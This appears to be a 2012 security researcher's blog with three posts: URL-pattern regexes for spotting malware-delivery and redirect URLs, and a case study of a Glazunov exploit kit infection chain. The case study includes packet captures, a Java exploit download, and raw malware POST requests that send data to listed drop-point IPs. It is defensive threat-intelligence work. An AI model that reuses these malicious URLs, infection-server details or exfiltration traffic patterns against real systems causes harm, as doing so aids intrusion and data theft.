Sunday, December 30, 2012

Parentesis URL Pattern, Likely Associated with Badness

I ran into an interesting URL pattern containing parenthesis in a specific method. On deeper inspection, it looks like this pattern may be associated with badness, the details of which I am not certain but thought good enough to bring to the community. 


My research on this so far indicates that some of the URLs are associated with known Zeus/Spyeye C2 servers, and a large number of these patterns hosted on legitimate sites whose subdirectories containing these patters are not indexed by Google. Also, it appears this pattern has been active for some time and may have been identified by other researchers, I am not sure.

Some URLquery patterns show redirects to a domain that was reported in December associated with drive by downloads in an Andriod forum which is no longer operational (at least today).

The observations at this time are that these are redirects, or contain redirects, to badness which is why I am bringing it to the community.







The URL pattern in question is:

\(s\(\w{24}\)\)?\/\w{2,}\.aspx

There is one URLquery report on this type of URL here. On inspection, this report shows a series of get requests including one URL which traces back to a report on undroid.us as containing badness ( hxxp://zirycatum.com/k985ytv.htm). I also noticed the k985ytv.htm more than once.




And I'm not alone in looking at this, going back a while now.

AVG did recognize the content.


Jsunpack 





www.undroid.us/wordpress/?cat=19
Dec 8, 2012 - 2. zirycatum.com (ex: hxxp://zirycatum.com/k985ytv.htm) 3. numudozaf.com (ex: hxxp://numudozaf.com/k985ytv.htm) Above all resolve to the same Moldova (south ...



Any feedback or further info, hit me up @fknsec

I have not researched if any IDS (Snort) sigs match this pattern.

HAPPY NEW YEAR





References:
http://urlquery.net/report.php?id=14666
www.undroid.us/wordpress/?cat=19
http://jsunpack.jeek.org/?report=fc505de91ae02e6ed905bb22746975e5d4d70c93
http://forums.cnet.com/7726-6132_102-3375245.html

Sunday, December 16, 2012

Unrecognized URL Pattern Involving Malware Binaries

In the interests of keeping FPs to a minimum, i'm including the mooo.com, but pull it out if you want to test your site for FPs. This appears to be designed to deliver malware binaries and at this point I do not have further to share. I would keep an eye out for this one and feedback any info please @fknsec #teamwork.


Pattern type 1
mooo\.com\/\w{2,8}\d{3}\_\d{4}\.php\?\w{4,10}\=

Pattern type 2 (appears to be only binaries)

mooo.com\/\?\w{2,9}\=[a-zA-Z0-9]{16,}


Pattern type 1 examples:

   hxxp://www2.e77lzbgasyhun.mooo.com/udhnj106_5613.php?8tpb=XN/p2KKso9zwx9vOme7R2attqqGVi6eg0LeVj...   
2012-12-14
    hxxp://www2.e77lzbgasyhun.mooo.com/zkzd106_5613.php?qamk2=lczm4W/ao6fi39bUh+jizLKjp5KgkaLOm3Sfo...   
2012-12-14
    hxxp://www2.tf6qzs0witws-0.mooo.com/dxohf241_5874.php?zh2cgpfl=nt6gy92ty9rZ16mX79yUtJ6srqdToOPM...   
2012-12-14
    hxxp://www2.f32w14gqqvnfax.mooo.com/owxryn107_5613.php?l4uv0n=kKfX723h3aek4ppa3NrVs6OckquSpN7ab...   
2012-12-14
    hxxp://www2.id0hx24nz8.mooo.com/twp211_5613.php?wzapem=m+XV6aLa29ak0epYqdfedaywkqOL3dLIbZuek5bQ...   
2012-12-14
    hxxp://www2.q04leu6wmk.mooo.com/nnxybd231_5619.php?qzgoh7=leXP26Wa0p6h14vqn9uqoKeroJXYoNVtZ5LG1...   
2012-12-14
    hxxp://www2.r4qjwq40c4.mooo.com/uxm211_5613.php?te47u=mN6WobLaluLO6dWfVtid2KJpbaalWuHT265nVsSW1...   
2012-12-14
    hxxp://www2.i9cofxif5uz6i7.mooo.com/vigpkh241_5688.php?9dyzjo2pw=Xdfn3eTnb+jg4KPd3ozt0spyqrBuoV...   
2012-12-14
    hxxp://www2.r4qjwq40c4.mooo.com/taedi107_5613.php?11zq1=Vabf5ZWvq97N3eWtVtidlW6vp2KlWuHT265nVsS...   
2012-12-14
    hxxp://www2.poqjik8iv0.mooo.com/yhxvgz106_5613.php?09rrso=VJ/o1djjrdLq193bno/rmZR2p6ikopbf2s6mn...   
2012-12-14
    hxxp://www2.e77lzbgasyhun.mooo.com/bdj106_5613.php?cmlw7lm=h9jl7XTh2dWtnODniNzK17adq5+Wk9zgm6mg...   
2012-12-14
    hxxp://www2.i9cofxif5uz6i7.mooo.com/fdje106_5613.php?pae5=lNjIodF2zuXL3NeMqt7ec55toZSLpdKdoKKM2...    /mxatxt241_5813.php?954u91o4yx=XZmV63af1Zvm4tPlj9uZ13KkbWemV6...   
2012-12-14
    hxxp://www2.poqjik8iv0.mooo.com/dano107_5613.php?0bqhdq36=VNDX3Myul63e2+eQ3tScpqtmYZWX2M3VcGmW0...   
2012-12-14
    hxxp://www2.poqjik8iv0.mooo.com/vqepgx107_5613.php?g9fm=i6fM4dis1eHX166P65nLdpujoaKX2tLPdZyckcm...   
2012-12-14
    hxxp://www2.e77lzbgasyhun.mooo.com/ppjdu106_5613.php?mteo6tgk=kd/e5XPp09vbnKvZoNfQxbCunqahk+TO0...   
2012-12-14



Pattern Type 2: Binary (as per Exploit Shield)

2012-12-13 17:13 http://www2.v-iy381t22z638.mooo.com/?0aimsen=VMTW0bDK5ttT3uKXdWara.... 78d5758eebe3df79ffd40efef16af944 7/45
2012-12-13 17:12 http://www2.v-iy381t22z638.mooo.com/?slwo4wee=l8%2Fk03Hc3cqcotLdcG.... 597f409a3f786a960b8683b4bb9ebdc7 12/46
2012-12-13 17:08 http://www2.v-iy381t22z638.mooo.com/?ugmrldkb=mcra1qnJ48ecotLdcG1o.... 1526a20a234749ae4cd61fa1e95e8559 12/46
2012-12-13 17:05 http://www2.v-iy381t22z638.mooo.com/?tkln=mM7Z0rOS4d5ZrZrYb2exbWle.... 70bc0edd237458587de240b8ef71a0d5 scanning...
2012-12-13 17:04 http://www2.v-iy381t22z638.mooo.com/?xl0r=nM%2Bd1rOS4d5ZrZrYb2exbW.... 337ac36ee8544e342200a85e38c88ce6 12/46
2012-12-14 13:52 http://www2.fmrmta0nhmql95.mooo.com/?4audhacuw1=WMTiyKXG29qdps%2FR.... 7261465fae1c1d0a9c776658c91da6a8 11/46
2012-12-14 13:51 http://www2.fmrmta0nhmql95.mooo.com/?hyvxj=jNzj3KfL5deT6cqUq52joaJ.... 6806bfa3b01fda85105dc265bfb625e2 11/46
2012-12-14 13:49 http://www2.fmrmta0nhmql95.mooo.com/?191lqzd=VZye0K7f3MuT59bYnmWkm.... 837b7e8a971805b33b2822677dd446a9 scanning...
2012-12-14 08:01 http://www2.g8gbbckylo8.mooo.com/?smbvs0=l9DP2rCV352N18vHqK6kp22Z4.... 49448bafc166568b3b8af8f7fc285ca5 9/45
2012-12-14 08:00 http://www2.g8gbbckylo8.mooo.com/?hgsx1=jMrg3G7MsMyI18zPtqGncJ2N5%.... e426696ef1f1b8c2814c7330cdd9a916 9/45
2012-12-14 01:33 http://www2.ie8qrahzp1jfg4.mooo.com/?uhsr2ea=mcvg1m%2FK2c6LrdrWnp2.... 42bd8297b01e1c1a50cf16a74ed8595a 16/45


Friday, December 7, 2012

Case Study: Exploiting Weakness To Quietly Exfiltrate Data

As per Emergingthreats, this is the Glazunov exploit kit.

This particular case is an excellent example to demonstrate that malware authors do their best to avoid detection and do not play by the internet rules. The utilization of defense in depth is a critical component to any information security program and would assist in limiting the damage from an attack of this nature.

This example shows:
  • A compromised site/malicious site which is, for the better part, unrecognized.
  • A redirect to HTTP TCP port 8080 direct to IP
  • Content delivery which appear innocuous in URL logs.
  • Java exploits which are not detected by virtually any AV
  • Malware which is not detected
  • Exfiltration of data on high ports showing as only TCP connections
  • Utilizing other people's IP addresses as drop points

This was achieved because of the following gaps in security:


  • Endpoint did not have updated Java version and was vulnerable
  • Web filtering did not block direct to IP requests
  • Layer 7 filtering was not performed at the perimeter (IPS) for the exploit code.
  • AV did not detect the malware
  • Outbound ports were not restricted. The endpoint could communicate outbound.




The entry point is a 301 redirect, however the content length is a28 and there is what AVG recognizes as a Blackhole redirect in the 301 response. 
hxxp://www.helloooooo.com/2009/01/splinter-impostor-claims-worlds-longest-hair/
This is a dangerous website and should not be visited in a browser.



The next step is for me to get the redirect URL.

GET /2009/01/splinter-impostor-claims-worlds-longest-hair/ HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: www.helloooooo.com
Connection: Keep-Alive

And gives me a gift... to quote my friend Tarun.
HTTP/1.1 200 OK
Date: Tue, 27 Nov 2012 00:10:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Pingback: http://www.helloooooo.com/xmlrpc.php
Link: <http://www.helloooooo.com/?p=1892>; rel=shortlink
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
5244
<script>if(window.document)try{new location(12);}catch(qqq){aa=[]+0;aaa=0+[];



The redirect is to a rigo6680.zapto.org/?go=2, this is consistent with TDS redirects.

http://jsunpack.jeek.org/?report=a41f7d02a6ef035c6808676b1cbd74814d53c88b

Additional redirects appear everywhere on the page, see the CSS redirect below.

Redirect from a CSS file.
http://wepawet.iseclab.org/view.php?hash=38d20de85abbc89a79ad6901b4f7becb&type=js&t=1354367725

What happens next?


The following URL chain occurs. Included in here is a youtube video, 74.125.x.y ip address.


609  31.956187  10.1.2.3 -> 74.125.236.9 HTTP 408 GET /v/hYaYCPmFWKw&hl=en&fs=1 HTTP/1.1
613  32.126215  10.1.2.3 -> 65.163.12.222 HTTP 454 GET /wp-content/themes/twentyten/images/wordpress.png HTTP/1.1
616  32.196442 65.163.12.222 -> 10.1.2.3  HTTP 1152 HTTP/1.1 200 OK  (PNG)
625  32.545505 74.125.236.9 -> 10.1.2.3  HTTP 674 HTTP/1.1 200 OK  (application/x-shockwave-flash)
637  33.374071  10.1.2.3 -> 64.34.183.111 HTTP 335 GET /2354796716/12230 HTTP/1.1
673  33.543459  10.1.2.3 -> 74.125.236.1 HTTP 382 GET /yts/swfbin/watch_as3-vfl1ubMZd.swf HTTP/1.1
688  33.587050 64.34.183.111 -> 10.1.2.3  HTTP 104 HTTP/1.1 200 OK  (application/x-java-archive)
695  33.626438  10.1.2.3 -> 64.34.183.111 HTTP 292 GET /2354796716/12230 HTTP/1.1
744  33.867125 64.34.183.111 -> 10.1.2.3  HTTP 104 HTTP/1.1 200 OK  (application/x-java-archive)
770  34.193535  10.1.2.3 -> 64.34.183.111 HTTP 245 GET /15692 HTTP/1.1
931  34.501338 64.34.183.111 -> 10.1.2.3  HTTP/DL 958 unknown (0x4d)

Here's the Java.




And we run the Java, which contains CVE 2012-1723 and the binary materializes and is executed immediately.


Posting Data to Drop Points


What we get are connections on TCP port 35516 posting  data to compromised Windows servers online. What is interesting about this is that it is not recognized as HTTP. It is only protocol TCP and on outbound port 35516. This would fly under the radar of many detection mechanisms.

This infection is a wonderful case study in an infection chain using difficult to detect methods and exploiting weaknesses in infrastructure, perimeter security and vulnerable workstation software.

Four IP addresses were drop points:
131.96.243.22
74.59.207.114
68.197.117.117
87.203.78.137

The infection point is 64.34.183.111:8080

Here is what the Posting looks like.








VT for Jar file. CVE 2012-1723 - 2/46
https://www.virustotal.com/file/4f88dd9dbeaba9a59ab1c077b4e98be72c66e59f79ad8cc95c0952530ca698f3/analysis/1354328781/

ed-309-aaenak.gsu.edu

Raw POST information


POST /nymain/nm1932719/index.php HTTP/1.1
Host: 131.96.243.22
Content-Length: 54
Accept-Encoding: deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Pragma: no-cache
Cache-Control: no-cache
Connection: close

filename=bphgt.ntz&data=œT¬»ñOõ[!5a9±r8ÆàSÞ¼ƒAôˆPöêÙ

HTTP/1.1 200 OK
Content-Length: 4
Connection: close

[

------------------------------------------------------------------


POST /nymain/nm1932719/index.php HTTP/1.1
Host: 74.59.207.114
Content-Length: 58
Accept-Encoding: deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Pragma: no-cache
Cache-Control: no-cache
Connection: close

filename=skjlrke.kcf&data=¾¤±ß]NçWB\—%~}SóC坣tZ‡£¬4Ø–‘

videotron.ca (1)
Host: modemcable114.207-59-74.mc.videotron.ca



@fknsec

All investigations were performed in my personal lab. This article's content and any opinions expressed are not the opinions of any past, present or future employer. Lawyers are our friends.